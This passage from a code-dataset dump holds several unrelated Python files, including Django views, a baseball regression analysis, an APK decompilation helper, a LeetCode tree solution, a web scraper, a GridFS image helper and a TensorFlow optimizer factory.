business_id,material_id):\n material = Material.objects.get(pk=material_id)\n\n if material.not_used_number > 0:\n material.not_used_number -= 1;\n material.used_number += 1;\n material.save()\n else:\n material.not_used_number = 0\n material.save()\n\n return HttpResponseRedirect(reverse('businesses:material', args=(business_id,)))\n\ndef material_return(request, business_id,material_id):\n material = Material.objects.get(pk=material_id)\n\n if material.used_number > 0:\n material.not_used_number += 1;\n material.used_number -= 1;\n material.save()\n else:\n material.used_number = 0\n material.save()\n\n return HttpResponseRedirect(reverse('businesses:material', args=(business_id,)))\n\n\n\ndef index(request):\n business_list = Business.objects.all()\n context = RequestContext(request, {'request': request, 'business_list': business_list})\n return render_to_response('businesses/index.html', context_instance=context)\n\ndef menu(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/menu.html', {'business': business})\n\n\ndef goal(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/goal_detail.html', {'business': business})\n\ndef worker(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/worker_detail.html', {'business': business})\n\ndef finance(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/finance_detail.html', {'business': business})\n\ndef resource(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/resource_detail.html', {'business': business})\n\ndef location(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/location_detail.html', {'business': business})\n\ndef material(request, business_id):\n business = get_object_or_404(Business, pk=business_id)\n return render(request, 'businesses/material_detail.html', {'business': business})\n\n\n\n\n","sub_path":"Final_Project/thirdauth/businesses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"288632343","text":"# Import libraries\nimport pandas as pd\nimport numpy as np\nfrom sklearn import linear_model\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\n#datasets: http://www.retrosheet.org/gamelogs/index.html\n#labels for the data set: http://www.retrosheet.org/gamelogs/glfields.txt\n'''\nField(s) Meaning\n 1 Date in the form \"yyyymmdd\"\n 2 Number of game:\n \"0\" -- a single game\n \"1\" -- the first game of a double (or triple) header\n including seperate admission doubleheaders\n \"2\" -- the second game of a double (or triple) header\n including seperate admission doubleheaders\n \"3\" -- the third game of a triple-header\n \"A\" -- the first game of a double-header involving 3 teams\n \"B\" -- the second game of a double-header involving 3 teams\n 3 Day of week (\"Sun\",\"Mon\",\"Tue\",\"Wed\",\"Thu\",\"Fri\",\"Sat\")\n 4-5 Visiting team and league\n 6 Visiting team game number\n For this and the home team game number, ties are counted as\n games and suspended games are counted from the starting\n rather than the ending date.\n 7-8 Home team and league\n 9 Home team game number\n10-11 Visiting and home team 
score (unquoted)\n 12 Length of game in outs (unquoted). A full 9-inning game would\n have a 54 in this field. If the home team won without batting\n in the bottom of the ninth, this field would contain a 51.\n 13 Day/night indicator (\"D\" or \"N\")\n 14 Completion information. If the game was completed at a\n later date (either due to a suspension or an upheld protest)\n this field will include:\n \"yyyymmdd,park,vs,hs,len\" Where\n yyyymmdd -- the date the game was completed\n park -- the park ID where the game was completed\n vs -- the visitor score at the time of interruption\n hs -- the home score at the time of interruption\n len -- the length of the game in outs at time of interruption\n All the rest of the information in the record refers to the\n entire game.\n 15 Forfeit information:\n \"V\" -- the game was forfeited to the visiting team\n \"H\" -- the game was forfeited to the home team\n \"T\" -- the game was ruled a no-decision\n 16 Protest information:\n \"P\" -- the game was protested by an unidentified team\n \"V\" -- a disallowed protest was made by the visiting team\n \"H\" -- a disallowed protest was made by the home team\n \"X\" -- an upheld protest was made by the visiting team\n \"Y\" -- an upheld protest was made by the home team\n Note: two of these last four codes can appear in the field\n (if both teams protested the game).\n 17 Park ID\n 18 Attendance (unquoted)\n 19 Time of game in minutes (unquoted)\n20-21 Visiting and home line scores. For example:\n \"010000(10)0x\"\n Would indicate a game where the home team scored a run in\n the second inning, ten in the seventh and didn't bat in the\n bottom of the ninth.\n22-38 Visiting team offensive statistics (unquoted) (in order):\n at-bats\n hits\n doubles\n triples\n homeruns\n RBI\n sacrifice hits. This may include sacrifice flies for years\n prior to 1954 when sacrifice flies were allowed.\n sacrifice flies (since 1954)\n hit-by-pitch\n walks\n intentional walks\n strikeouts\n stolen bases\n caught stealing\n grounded into double plays\n awarded first on catcher's interference\n left on base\n39-43 Visiting team pitching statistics (unquoted)(in order):\n pitchers used ( 1 means it was a complete game )\n individual earned runs\n team earned runs\n wild pitches\n balks\n44-49 Visiting team defensive statistics (unquoted) (in order):\n putouts. Note: prior to 1931, this may not equal 3 times\n the number of innings pitched. 
Prior to that, no\n putout was awarded when a runner was declared out for\n being hit by a batted ball.\n assists\n errors\n passed balls\n double plays\n triple plays\n50-66 Home team offensive statistics\n67-71 Home team pitching statistics\n72-77 Home team defensive statistics\n78-79 Home plate umpire ID and name\n80-81 1B umpire ID and name\n82-83 2B umpire ID and name\n84-85 3B umpire ID and name\n86-87 LF umpire ID and name\n88-89 RF umpire ID and name\n If any umpire positions were not filled for a particular game\n the fields will be \"\",\"(none)\".\n90-91 Visiting team manager ID and name\n92-93 Home team manager ID and name\n94-95 Winning pitcher ID and name\n96-97 Losing pitcher ID and name\n98-99 Saving pitcher ID and name--\"\",\"(none)\" if none awarded\n100-101 Game Winning RBI batter ID and name--\"\",\"(none)\" if none\n awarded\n102-103 Visiting starting pitcher ID and name\n104-105 Home starting pitcher ID and name\n106-132 Visiting starting players ID, name and defensive position,\n listed in the order (1-9) they appeared in the batting order.\n133-159 Home starting players ID, name and defensive position\n listed in the order (1-9) they appeared in the batting order.\n 160 Additional information. This is a grab-bag of informational\n items that might not warrant a field on their own. The field \n is alpha-numeric. Some items are represented by tokens such as:\n \"HTBF\" -- home team batted first.\n Note: if \"HTBF\" is specified it would be possible to see\n something like \"01002000x\" in the visitor's line score.\n Changes in umpire positions during a game will also appear in \n this field. These will be in the form:\n umpchange,inning,umpPosition,umpid with the latter three\n repeated for each umpire.\n These changes occur with umpire injuries, late arrival of \n umpires or changes from completion of suspended games. Details\n of suspended games are in field 14.\n 161 Acquisition information:\n \"Y\" -- we have the complete game\n \"N\" -- we don't have any portion of the game\n \"D\" -- the game was derived from box score and game story\n \"P\" -- we have some portion of the game. 
We may be missing\n innings at the beginning, middle and end of the game.\n \nMissing fields will be NULL.\n'''\n\ninput_df = pd.read_table(\"GL2015.TXT\", sep=\",\", header=None)\n\n# Method to rename columns of an input dataframe (for readability)\n# Input type: dataframe\n# Output type: dataframe\ndef rename_cols(input_df):\n input_df.rename(columns = {3: 'Visiting Team', 6: 'Home Team', 9: 'Runs Visitor', 10: 'Runs Home'}, inplace=True)\n return input_df\n\n# Invoke function to rename columns\ninput_df = rename_cols(input_df)\n\n# Method to add new columns to indicate whether home team or visiting team won the game\n# Input type: dataframe\n# Output type: dataframe\ndef add_new_cols(input_df):\n input_df['Home Win'] = (input_df['Runs Home'] > input_df['Runs Visitor'])\n input_df['Visitor Win'] = (input_df['Runs Visitor'] > input_df['Runs Home'])\n return input_df\n\n# Method to group data by home team and compute relevant statistics\n# Input type: dataframe\n# Output type: dataframe (with stats grouped by home team)\ndef proc_home_team_data(input_df):\n\n # Group by home team\n home_group = input_df.groupby(input_df['Home Team'])\n\n # Compute stats: Number of games, runs scored, runs conceded, wins, run differential\n home_df = home_group[['Runs Visitor', 'Runs Home', 'Home Win']].apply(sum)\n home_df['Home Games'] = home_group['Home Win'].count()\n home_df.rename(columns = {'Runs Visitor': 'Runs by Visitor', 'Runs Home': 'Runs at Home', 'Home Win': 'Wins at Home'}, inplace=True)\n home_df['RD at Home'] = home_df['Runs at Home'] - home_df['Runs by Visitor']\n home_df.index.rename('Team', inplace=True)\n home_df.reset_index(inplace=True)\n\n return home_df\n\n# Method to group data by visiting team and compute relevant statistics\n# Input type: dataframe\n# Output type: dataframe (with stats grouped by visiting team)\ndef proc_visiting_team_data(input_df):\n\n # Group by visiting team\n visit_group = input_df.groupby(input_df['Visiting Team'])\n\n # Compute stats: Number of games, runs scored, runs conceded, wins, run differential\n visit_df = visit_group[['Runs Visitor', 'Runs Home', 'Visitor Win']].apply(sum)\n visit_df['Road Games'] = visit_group['Visitor Win'].count()\n visit_df.rename(columns = {'Runs Visitor': 'Runs as Visitor', 'Runs Home': 'Runs by Home', \n 'Visitor Win': 'Wins as Visitor'}, inplace=True)\n visit_df['RD as Visitor'] = visit_df['Runs as Visitor'] - visit_df['Runs by Home']\n visit_df.index.rename('Team', inplace=True)\n visit_df.reset_index(inplace=True)\n\n return visit_df\n\n# Method to merge dataframes with statistics grouped by home and visiting teams\n# and to explicitly compute explanatory and response variables\n# Input type: dataframe, dataframe\n# Output type: dataframe\ndef merge_data_frames(home_df, visit_df):\n # Compute explanatory and response variables\n overall_df = home_df.merge(visit_df, how='outer', left_on='Team', right_on='Team')\n overall_df['RD'] = overall_df['RD at Home'] + overall_df['RD as Visitor']\n overall_df['Win Pct'] = (overall_df['Wins at Home'] + overall_df['Wins as Visitor']) / (overall_df['Home Games'] + overall_df['Road Games'])\n overall_df['Pythagorean expectation'] = 162 * (1 / (1 + np.power(\n (overall_df['Runs by Visitor'] + overall_df['Runs by Home'])/\n (overall_df['Runs as Visitor'] + overall_df['Runs at Home']), 1.83)))\n\n # Return dataframe with explanatory and response variables\n return overall_df\n\n# Method to collate all data preprocessing steps\n# Input type: dataframe\n# Output type: dataframe\ndef 
extract_linear_reg_inputs(input_df):\n # Rename columns\n input_df = rename_cols(input_df)\n\n # Add new columns\n input_df = add_new_cols(input_df)\n\n # Group and process data by home team\n home_df = proc_home_team_data(input_df)\n\n # Group and process data by visiting team\n visit_df = proc_visiting_team_data(input_df)\n\n # Merge home and visitor dataframes\n overall_df = merge_data_frames(home_df, visit_df)\n\n return overall_df\n\n# Get training data from 2011-2015 to train the linear regression model\n\n# Initialize arrays to hold training data\ntrain_run_diff = np.empty([0, 1])\ntrain_win_pct = np.empty([0, 1])\n\n# Loop\nfor year in range(2011, 2016):\n # Construct log file name\n log_file = \"GL\" + str(year) + \".TXT\"\n\n # Read log into a dataframe\n df = pd.read_table(log_file, sep=\",\", header=None)\n\n # Extract relevant stats into another dataframe\n df_proc = extract_linear_reg_inputs(df)\n\n # Add to training set\n train_run_diff = np.vstack([train_run_diff, df_proc['RD'].values.reshape([-1, 1])])\n train_win_pct = np.vstack([train_win_pct, df_proc['Win Pct'].values.reshape([-1, 1])]) \n\n # Instantiate an object\nlin_regr = linear_model.LinearRegression(fit_intercept=True)\n\n# Compute model parameters with training data\nlin_regr.fit(train_run_diff, train_win_pct)\n\n# Access and display model parameters\nprint(\"Slope (a) = \", float(lin_regr.coef_), \" Intercept (b) = \", float(lin_regr.intercept_))\n\n# Get regression score (R-squared)\nr_squared = lin_regr.score(train_run_diff, train_win_pct)\nprint(\"R-squared for linear fit = \", r_squared)\n\n# Visualize\nx_ax = np.array(range(int(np.min(train_run_diff)), int(np.max(train_run_diff)))).reshape(-1, 1)\ny_ax = lin_regr.coef_ * x_ax + lin_regr.intercept_\nplt.plot(train_run_diff, train_win_pct, 'bo', label=\"training_data\")\nplt.plot(x_ax, y_ax, 'r', label=\"model_fit\")\nplt.plot([-300, 300], [0.5, 0.5], \"k--\")\nplt.plot([0, 0], [0.30, 0.65], \"k--\")\nplt.ylim([0.30, 0.65])\nplt.xlabel(\"Run differential\")\nplt.ylabel(\"Win percentage\")\nplt.legend(loc=\"lower right\")\nplt.show()\n\n# Construct test dataset\nlog_file = \"GL2016.TXT\"\ndf = pd.read_table(log_file, sep=\",\", header=None)\ndf_proc = extract_linear_reg_inputs(df)\ntest_run_diff = df_proc['RD'].values.reshape([-1, 1])\ntest_win_pct = df_proc['Win Pct'].values.reshape([-1, 1])\n\n# Predict outcomes using regression model\npredict_win_pct = lin_regr.predict(test_run_diff)\n\n# Compute percentage error for linear regression model on test set\nmean_abs_error_test = np.mean(np.abs(predict_win_pct - test_win_pct))\nprint(\"Percentage error on test set = \", 100. * mean_abs_error_test, \"%\")\n\n# Compute percentage error for linear regression model on training set\nmodel_fit_train = lin_regr.predict(train_run_diff)\nmean_abs_error_training = np.mean(np.abs(model_fit_train - train_win_pct))\nprint(\"Percentage error on training set \", 100. 
* mean_abs_error_training, \"%\")\n\n# Visualize\nplt.plot(test_win_pct, predict_win_pct, 'bo')\nplt.plot([0.35, 0.7], [0.35, 0.7], 'r')\nplt.xlabel(\"Actual win percentage\")\nplt.ylabel(\"Predicted win percentage\")\nplt.title(\"MLB 2016 season\")\nplt.show()\n\n\n","sub_path":"baseballStats/baseballStats1.py","file_name":"baseballStats1.py","file_ext":"py","file_size_in_byte":13466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"64117131","text":"#encoding : utf-8\nimport os\nimport sys\nimport shutil\nfrom shutil import move\n\ndef decompilation(filename):\n# function of decompilation\n apktool_command = \"apktool.jar d \" + filename\n os.system(apktool_command)\n\ndef mkdirs(path):\n# function of make a dir\n path=path.strip()\n path=path.rstrip(\"\\\\\")\n isExists=os.path.exists(path)\n if not isExists:\n os.makedirs(path)\n return True\n else:\n return False\n# Decomplication of Apk file\nif __name__ == '__main__':\n path = './InputApk/'\n for root,dirs,files in os.walk(path):\n for file in files:\n apkname = os.path.join(root, file)\n if apkname.endswith('.apk'):\n decompilation(apkname)\n# Creating folders with smali files\n# Moving smali files to corresponding folders\n for root, dirs, files in os.walk('./'):\n for file in files:\n if file.endswith('.smali'):\n smaliname=os.path.split(file)[1]\n smalifile=os.path.dirname(os.path.join(root,file))\n foldername=smalifile.split('smali')\n smalidir='./BytecodeFiles/'+foldername[0]+foldername[1].replace('\\\\','.')\n mkdirs(smalidir)\n move(smalifile+'\\\\'+smaliname,smalidir+'\\\\'+smaliname)\n","sub_path":"Apk2bytecode.py","file_name":"Apk2bytecode.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"540459054","text":"# coding=utf-8\n#\n# @lc app=leetcode id=236 lang=python\n#\n# [236] Lowest Common Ancestor of a Binary Tree\n#\n# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/description/\n#\n# algorithms\n# Medium (38.83%)\n# Likes: 2223\n# Dislikes: 143\n# Total Accepted: 310.1K\n# Total Submissions: 795.5K\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n1'\n#\n# Given a binary tree, find the lowest common ancestor (LCA) of two given nodes\n# in the tree.\n# \n# According to the definition of LCA on Wikipedia: “The lowest common ancestor\n# is defined between two nodes p and q as the lowest node in T that has both p\n# and q as descendants (where we allow a node to be a descendant of itself).”\n# \n# Given the following binary tree:  root = [3,5,1,6,2,0,8,null,null,7,4]\n# \n# \n# \n# Example 1:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1\n# Output: 3\n# Explanation: The LCA of nodes 5 and 1 is 3.\n# \n# \n# Example 2:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4\n# Output: 5\n# Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant\n# of itself according to the LCA definition.\n# \n# \n# \n# \n# Note:\n# \n# \n# All of the nodes' values will be unique.\n# p and q are different and both values will exist in the binary tree.\n# \n# \n#\n# Definition for a binary tree node.\n\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n # 必须没有重复的出现\n 
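# Translation of the comment above: there must be no duplicate values\n # (all node values are unique, per the problem statement). getNodeDepth\n # reports whether p or q occurs in a subtree; the lowest node at which two\n # of (itself, left subtree, right subtree) report a hit is the LCA, and it\n # is recorded in self.father.\n 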
self.father = None\n self.getNodeDepth(root, p, q)\n return self.father\n\n def getNodeDepth(self, root, p, q):\n if not root:\n return\n one = root.val in [p.val, q.val]\n left = self.getNodeDepth(root.left, p, q)\n right = self.getNodeDepth(root.right, p, q)\n if (one and left) or (one and right) or (left and right):\n self.father = root\n return one or left or right\n\n\n# if __name__ == '__main__':\n# s = Solution()\n# head = TreeNode(3)\n# head.left = TreeNode(5)\n# head.right = TreeNode(1)\n# head.left.left = TreeNode(6)\n# head.left.right = TreeNode(2)\n# head.left.right.left = TreeNode(7)\n# head.left.right.right = TreeNode(4)\n# head.right.left = TreeNode(0)\n# head.right.right = TreeNode(8)\n# print s.lowestCommonAncestor(head, 5, 1)\n","sub_path":"236.lowest-common-ancestor-of-a-binary-tree.py","file_name":"236.lowest-common-ancestor-of-a-binary-tree.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"356219002","text":"from datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\n\nclass Todo(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n task = db.Column(db.Text)\n done = db.Column(db.Boolean)\n date = db.Column(db.DateTime)\n\n def __init__(self, task, done):\n self.task = task\n self.done = done\n self.date = datetime.utcnow()","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"272126350","text":"#!/usr/bin/env python\n\n__author__ = 'meatz'\n\nimport numpy as np\n\n\nimport csv\nimport gzip\nimport sys\nimport time\nimport os\nimport re\nimport json\nimport time\nimport calendar\nimport datetime\nfrom collections import defaultdict\nfrom collections import Counter\nimport fnmatch\n\n\n# add ecmwf_utils to python path\nutil_path = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\nprint (util_path)\nsys.path.append(util_path)\n\nfrom ecmwf_util import Statistics\n\ndef prettyfy(number):\n d = float(number)\n if d - int(d) > 0:\n return '{:,.2f}'.format(d)\n return '{:,d}'.format(int(d))\n\nresults = {}\n\ntapes_counter = Counter()\n\nresults[\"total_counted_requests\"] = 0\nresults[\"total_requests_with_fdb\"] = 0\nresults[\"total_requests_with_tape\"] = 0\nresults[\"total_requests_with_disk\"] = 0\n\nresults[\"total_requests_with_fdb_only\"] = 0\nresults[\"total_requests_with_tape_only\"] = 0\nresults[\"total_requests_with_disk_only\"] = 0\n\nexectimes_with_tape = Counter()\nexectimes_no_tape = Counter()\n\ndef dump(todo_list_retrieves):\n TS = 0\n FIELDS = 1 \n FIELDS_ONLINE = 2\n FIELDS_OFFLINE = 3\n BYTES = 4\n BYTES_ONLINE = 5\n BYTES_OFFLINE = 6\n TAPES = 7\n TAPE_FILES = 8\n EXEC_TIME = 9\n DATABASE = 10\n\n\n retrieves_files_read_cnt = 0\n for sf in source_files:\n retrieves_files_read_cnt += 1\n\n # if retrieves_files_read_cnt == 3:\n # return\n with gzip.open(sf, 'rt') as csv_file:\n reader = csv.reader(csv_file, delimiter=';')\n next(reader) # skip header\n \n for row in reader:\n fields = int(row[FIELDS]) + int(row[FIELDS_ONLINE]) + int(row[FIELDS_OFFLINE])\n \n bytes = int(row[BYTES])\n bytes_online = int(row[BYTES_ONLINE])\n bytes_offline = int(row[BYTES_OFFLINE])\n\n tapes = int(row[TAPES])\n exec_time = int(row[EXEC_TIME])\n\n if bytes > 0:\n if bytes > (1024 * 1024 * 1024 * 1024) :\n print (\"skipping line: %s\" % row)\n pass\n else:\n 
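# Rows reporting more than 1 TiB are skipped above as implausible; for the\n # rest, the non-zero byte counters below determine which storage tiers were\n # hit (FDB cache when online+offline bytes do not account for the total,\n # online disk, offline tape), and execution times are binned by whether any\n # tapes were used.\n 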
results[\"total_counted_requests\"] += 1\n tapes_counter[tapes] += 1\n\n if bytes > 0 and (bytes_online + bytes_offline) != bytes:\n results[\"total_requests_with_fdb\"] += 1\n if bytes_online > 0:\n results[\"total_requests_with_disk\"] += 1\n if bytes_offline > 0:\n results[\"total_requests_with_tape\"] += 1\n \n if bytes > 0 and bytes_online == 0 and bytes_offline == 0:\n results[\"total_requests_with_fdb_only\"] += 1\n \n if bytes > 0 and bytes_online == bytes and bytes_offline == 0:\n results[\"total_requests_with_disk_only\"] += 1\n\n if bytes > 0 and bytes_online == 0 and bytes_offline == bytes:\n results[\"total_requests_with_tape_only\"] += 1\n\n if tapes > 0:\n exectimes_with_tape[exec_time] += 1\n else:\n exectimes_no_tape[exec_time] += 1\n\n\n print(\"%s finished reading retrieves_file: %d : %s\" % (datetime.datetime.now(), retrieves_files_read_cnt, sf))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print (\"usage: /path/to/*retrieves.csv.gz\")\n sys.exit(1)\n\n source_dir = os.path.abspath(sys.argv[1])\n\n source_files = [os.path.join(dirpath, f)\n for dirpath, dirnames, files in os.walk(source_dir)\n for f in fnmatch.filter(files, '*.retrieves.csv.gz')]\n\n\n dump(source_files)\n\n results[\"fraction_of_requests_with_tape_percent\"] = prettyfy(float(results[\"total_requests_with_tape\"]) / results[\"total_counted_requests\"] * 100)\n\n\n er = {}\n er[\"with_tape\"] = {}\n er[\"no_tape\"] = {}\n er[\"tapes_counter\"] = {}\n\n\n elems = list(exectimes_no_tape.elements())\n er[\"no_tape\"][\"P05\"] = prettyfy(Statistics.percentile(elems, 0.05))\n er[\"no_tape\"][\"P25\"] = prettyfy(Statistics.percentile(elems, 0.25))\n er[\"no_tape\"][\"P50\"] = prettyfy(Statistics.percentile(elems, 0.50))\n er[\"no_tape\"][\"P95\"] = prettyfy(Statistics.percentile(elems, 0.95))\n er[\"no_tape\"][\"P99\"] = prettyfy(Statistics.percentile(elems, 0.99))\n er[\"no_tape\"][\"mean\"] = Statistics.get_meanconf_string(elems)\n\n elems = list(exectimes_with_tape.elements())\n er[\"with_tape\"][\"P05\"] = prettyfy(Statistics.percentile(elems, 0.05))\n er[\"with_tape\"][\"P25\"] = prettyfy(Statistics.percentile(elems, 0.25))\n er[\"with_tape\"][\"P50\"] = prettyfy(Statistics.percentile(elems, 0.50))\n er[\"with_tape\"][\"P95\"] = prettyfy(Statistics.percentile(elems, 0.95))\n er[\"with_tape\"][\"P99\"] = prettyfy(Statistics.percentile(elems, 0.99))\n er[\"with_tape\"][\"mean\"] = Statistics.get_meanconf_string(elems)\n \n tapes_counter\n elems = list(tapes_counter.elements())\n er[\"tapes_counter\"][\"P05\"] = prettyfy(Statistics.percentile(elems, 0.05))\n er[\"tapes_counter\"][\"P25\"] = prettyfy(Statistics.percentile(elems, 0.25))\n er[\"tapes_counter\"][\"P50\"] = prettyfy(Statistics.percentile(elems, 0.50))\n er[\"tapes_counter\"][\"P95\"] = prettyfy(Statistics.percentile(elems, 0.95))\n er[\"tapes_counter\"][\"P99\"] = prettyfy(Statistics.percentile(elems, 0.99))\n er[\"tapes_counter\"][\"mean\"] = Statistics.get_meanconf_string(elems)\n \n results[\"tape_exectimes\"] = er\n\n print (json.dumps(results, indent=2))","sub_path":"mars_feedback/feedback/analyze_requests.py","file_name":"analyze_requests.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"224798377","text":"from bs4 import BeautifulSoup\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\nimport datetimehandler\n\n\nopts = 
Options()\nopts.set_headless()\n\nassert opts.set_headless\nbrowser = Firefox(options=opts)\n\ntarget_url = 'http://www.elkhabar.com/press/article/2/'\nbrowser.get(target_url)\n\ntry:\n print(\"---entering try---\")\n err404 = browser.find_element_by_xpath('/html/body/div/center/div/div[2]/h2')\n page404_cnt += 1\n print(\"404 found: i = \",i)\n \nexcept NoSuchElementException:\n # page exists, proceed with code\n\n page = browser.page_source\n soup = BeautifulSoup(page, 'lxml')\n\n title_box = soup.find('h2', attrs={'id': 'article_title'})\n date_box = soup.find('time', attrs={'class': 'relative_time'}).get('datetime')\n article_box = soup.find('div', attrs={'id': 'article_body_content'})\n\n title = title_box.text.strip()\n date = date_box.text.strip()\n article = article_box.text.strip()\n\n print(datetimehandler.convertRSSdate(date))\n print(title)\n","sub_path":"YaleBigData/test/grabDateWithGet.py","file_name":"grabDateWithGet.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"89697854","text":"'''\nCreated on 2013-8-6\nclass mongoInsert\n@author: tree\n'''\n__metaclass__ = type\n\nimport os\nfrom pymongo.database import Database\nimport time\nimport gridfs\nimport StringIO\nclass mongoImg(object):\n \"\"\"mongoInsert is a class for inserting document\n \n \n \"\"\"\n def __init__(self, database, dir=None):\n \"\"\"Create a new instance of :class:mongoInsert\n :Parameters:\n - `database`: database to use\n - `dir` : directory of document \n \"\"\"\n if not isinstance(database, Database):\n raise TypeError(\"database must be an instance of Database\")\n\n \n# self.__con = Connection()\n self.__imgdb = database\n self.__imgfs = gridfs.GridFS (self.__imgdb)\n self.__dir = dir\n self.__filelist=[]\n\n #save filepath in list.txt\n def __dirwalk(self,topdown=True):\n \"\"\"traverse the documents of self.__dir and save in self.__filelist\n \"\"\"\n sum=0\n self.__filelist.clear()\n \n for root,dirs,files in os.walk(self.__dir,topdown):\n for name in files:\n sum+=1\n temp=os.path.join(root,name)\n self.__filelist.append(temp)\n print(sum)\n\n #insert image \n def insert(self):\n \"\"\"insert images in mongodb\n \"\"\"\n self.__dirwalk()\n\n tStart = time.time() \n for fi in self.__filelist: \n with open (fi,'rb') as myimage:\n data=myimage.read() \n self.__imgfs.put(data, content_type = \"jpg\", filename =fi)\n \n tEnd =time.time ()\n print (\"It cost %f sec\" % (tEnd - tStart))\n \n #get image by filename\n def getbyname(self,filename,prefix=''):\n \"\"\"get img from mongdb by filename\n \"\"\"\n \n dataout=self.__imgfs.get_version(filename,**{'prefix':prefix})\n imgout = StringIO.StringIO()\n try:\n #imgout=open(savepath,'wb')\n data=dataout.read()\n imgout.write(data)\n \n\n finally:\n pass\n return imgout\nif __name__=='__main__':\n #db = MongoClient().gridfs_example\n #fs = GridFS(db)\n #file=open('/home/mujun/image/psb.jpeg')\n alias=GridFs.connection() \n \n mi=mongoImg(GridFs._dbs[alias])\n \n mi.getbyname('/')\n #save(file, 'partner.jpg')\n #a = fs.put(file,filename=\"partner\")\n #print fs.get(a).filename\n \n \n#http://www.cnblogs.com/bigbigtree/archive/2013/08/07/3242483.html\n","sub_path":"core/mongoop.py","file_name":"mongoop.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"414548290","text":"# -*- coding: utf-8 -*-\n\"\"\" \n Author: Kai JIN\n Updated: 2017-03-16\n\"\"\"\nimport 
tensorflow as tf\nfrom core.utils.logger import logger\n\n\ndef configure_optimizer(config, learning_rate):\n \"\"\"Configures the optimizer used for training.\n Args:\n config: config.train.optimizer\n learning_rate: A scalar or `Tensor` learning rate.\n Returns:\n An instance of an optimizer.\n Raises:\n ValueError: if opt.optimizer is not recognized.\n \"\"\"\n logger.info('Routine will use %s optimizer.' % config.name)\n\n if config.name == 'adadelta':\n optimizer = tf.train.AdadeltaOptimizer(\n learning_rate,\n rho=config.rho,\n epsilon=config.epsilon)\n\n elif config.name == 'adagrad':\n optimizer = tf.train.AdagradOptimizer(\n learning_rate,\n initial_accumulator_value=config.initial_accumulator_value)\n\n elif config.name == 'adam':\n optimizer = tf.train.AdamOptimizer(\n learning_rate,\n beta1=config.beta1,\n beta2=config.beta2,\n epsilon=config.epsilon)\n\n elif config.name == 'ftrl':\n optimizer = tf.train.FtrlOptimizer(\n learning_rate,\n learning_rate_power=config.learning_rate_power,\n initial_accumulator_value=config.initial_accumulator_value,\n l1_regularization_strength=config.l1,\n l2_regularization_strength=config.l2)\n\n elif config.name == 'momentum':\n optimizer = tf.train.MomentumOptimizer(\n learning_rate,\n momentum=config.momentum,\n name='Momentum')\n\n elif config.name == 'rmsprop':\n optimizer = tf.train.RMSPropOptimizer(\n learning_rate,\n decay=config.decay,\n momentum=config.momentum,\n epsilon=config.epsilon)\n\n elif config.name == 'proximal':\n optimizer = tf.train.ProximalGradientDescentOptimizer(\n learning_rate,\n l1_regularization_strength=config.l1_regularization_strength,\n l2_regularization_strength=config.l2_regularization_strength)\n\n elif config.name == 'proximal_adagrad':\n optimizer = tf.train.ProximalAdagradOptimizer(\n learning_rate,\n initial_accumulator_value=config.initial_accumulator_value,\n l1_regularization_strength=config.l1_regularization_strength,\n l2_regularization_strength=config.l2_regularization_strength)\n\n elif config.name == 'sgd':\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n\n else:\n raise ValueError('Optimizer [%s] was not recognized' % config.name)\n\n return optimizer\n","sub_path":"core/solver/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"353347140","text":"\"\"\"Tests for nexus reading -- Maddison et al example\"\"\"\nimport os\nimport unittest\nfrom nexus import NexusReader\n\nEXAMPLE_DIR = os.path.join(os.path.dirname(__file__), '../examples')\n\nclass Test_Maddison_et_al_Spec(unittest.TestCase):\n expected = {\n 'fish': [_ for _ in 'ACATAGAGGGTACCTCTAAG'],\n 'frog': [_ for _ in 'ACTTAGAGGCTACCTCTACG'],\n 'snake': [_ for _ in 'ACTCACTGGGTACCTTTGCG'],\n 'mouse': [_ for _ in 